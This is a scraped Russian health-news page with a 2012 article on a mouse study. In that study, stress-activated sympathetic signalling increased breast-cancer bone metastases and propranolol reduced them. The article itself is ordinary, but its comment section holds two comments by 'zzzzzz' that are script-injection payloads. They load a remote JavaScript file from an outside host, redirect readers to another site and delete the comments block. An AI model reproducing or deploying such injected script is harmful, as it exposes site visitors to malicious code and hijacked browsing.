Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новое лекарство против ме...  >>  Новое лекарство против метастазов
 
Обратная связь
 

Новое лекарство против метастазов

Размер шрифта
07 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Известно, что стресс приводит к распространению раковых клеток из опухоли молочной железы в кости. Недавно ученые нашли новое средство для профилактики метастазов этого вида рака.

метастазы

Рак молочной железы

Рак – это вид злокачественной опухоли, которая развивается из клеток эпителиальной ткани кожи, слизистых оболочек и различных внутренних органов. Общей характеристикой злокачественных опухолей является утрата клетками способности к дифференцировке с нарушением структуры ткани, из которой происходит опухоль. Рак молочной железы занимает лидирующие позиции среди злокачественных опухолей у женщин. Ежегодно в мире регистрируется более 1 миллиона новых случаев рака молочной железы, и этот показатель постоянно растет.

Рак молочной железы нередко осложняется метастазами. Процесс метастазирования представляет собой распространение опухолевых клеток с током крови или лимфы с образованием новых очагов опухолевого роста. Причем лимфогенные метастазы появляются в регионарных лимфатических узлах: передних грудных, подмышечных, подключичных и надключичных, а гематогенные метастазы обнаруживаются чаще в костях, легких, печени, почках.

История вопроса

В ответ на стресс в нашем организме происходит активация симпатической нервной системы. Ранее ученые установили, что симпатическая нервная система вызывает перестройку костей с помощью тех же сигнальных молекул, которые участвуют в переносе раковых клеток из опухоли молочной железы в кости.

В связи с этим возникла гипотеза, согласно которой метастазирование рака молочной железы в кости на фоне стресса происходит в результате активации симпатической нервной системы. Данную гипотезу подтверждают клинические наблюдения: пациенты, которые испытывают стресс или страдают депрессией, имеют меньшую продолжительность жизни.

Суть исследования

В ходе проведенного исследования на мышах гипотеза подтвердилась: стимуляция симпатической нервной системы сопровождалась появлением большого количества метастазов в костях. Однако использование бета-блокатора пропранолола позволило уменьшить количество метастазов.

Бета-блокаторы используются для лечения артериальной гипертензии и ишемической болезни сердца. Препараты этой группы хорошо изучены и стоят достаточно недорого. Таким образом, бета-блокаторы можно использовать для профилактики метастазирования рака молочной железы в кости. Однако для подтверждения полученных результатов потребуются дополнительные исследования.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Раки, которые мы победили   Носите лифчик на здоровье! Теперь не страшно!   Только в Парке Горького можно спокойно увидеть женскую грудь! И помочь в борьбе с раком груди!   Узнайте все о своей груди от Елены Малышевой 12 октября в Парке Горького!  
06 февраля 2013Технология разведения коров позволяет определить риск развития рака 18 октября 2012Новый тест скажет, будет у вас рак или нет
 
06 сентября 2012Найдено новое лекарство против метастазов! 09 августа 2012Раковые клетки теперь не смогут скрыться!
 

Слайдшоу

1
Мастопатия может коснуться каждой
Береги грудь смолоду
Вся правда о раке груди

Тесты

Что вы знаете о раке груди?
Что вы знаете о раке груди?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.